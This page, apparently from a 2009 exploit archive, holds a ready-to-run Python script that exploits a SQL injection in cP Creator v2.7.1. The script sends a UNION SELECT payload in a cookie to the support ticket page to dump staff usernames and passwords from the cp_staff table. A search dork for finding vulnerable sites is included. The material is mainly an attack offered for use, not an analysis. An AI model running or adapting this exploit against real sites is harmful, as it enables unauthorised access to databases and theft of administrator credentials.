[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : cP Creator v2.7.1 Remote Sql Injection
# Published : 2009-09-21
# Author : Sina Yazdanmehr
# Previous Title : BAnner ROtation System mini Multiple Remote File Inclusion
# Next Title : CMScontrol (Content Management Portal Solutions) Sql Injection
#!/usr/bin/python
#####################################################################################
#### cP Creator v2.7.1 Remote Sql Injection ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : http://IrCrash.com -> (Coming Soon Again) #
#My Official WebSite : http://R3dW0rm.ir #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) #
#####################################################################################
# #
#Download : http://www.cpcreator.net #
# #
#Dork : Powered by cP Creator v2.7.1 #
# #
#*** Magic Quotes gpc = Off *** #
# #
###################################### TNX GOD ######################################
import sys,httplib
p = ''
if len(sys.argv) < 3 :
print "nPowered by : R3d.W0rm"
print "Http://IrCrash.Com - Http://R3dW0rm.Ir"
print "Usage : code.py [host] /[path]"
exit()
co = {"Cookie": "tickets=-999' union select 0,concat(0x265E21402A,user,0x3A,pass,0x265E21402A),2,3,4,5,6,7,8 from cp_staff/*;"}
c = httplib.HTTPConnection(sys.argv[1],80)
c.request("GET", "/" + sys.argv[2] + "/?page=support&task=ticket", p, co)
data = c.getresponse().read()
if "&^!@*" not in data :
print "Attack Failed ."
exit()
output = data.split("&^!@*")
print "n+-------------------------------------+"
print "nPowered by : R3d.W0rm"
print "Http://IrCrash.Com - Http://R3dW0rm.Irn"
print "+-------------------------------------+"
print "n " + output[1]
# www.Syue.com [2009-09-21]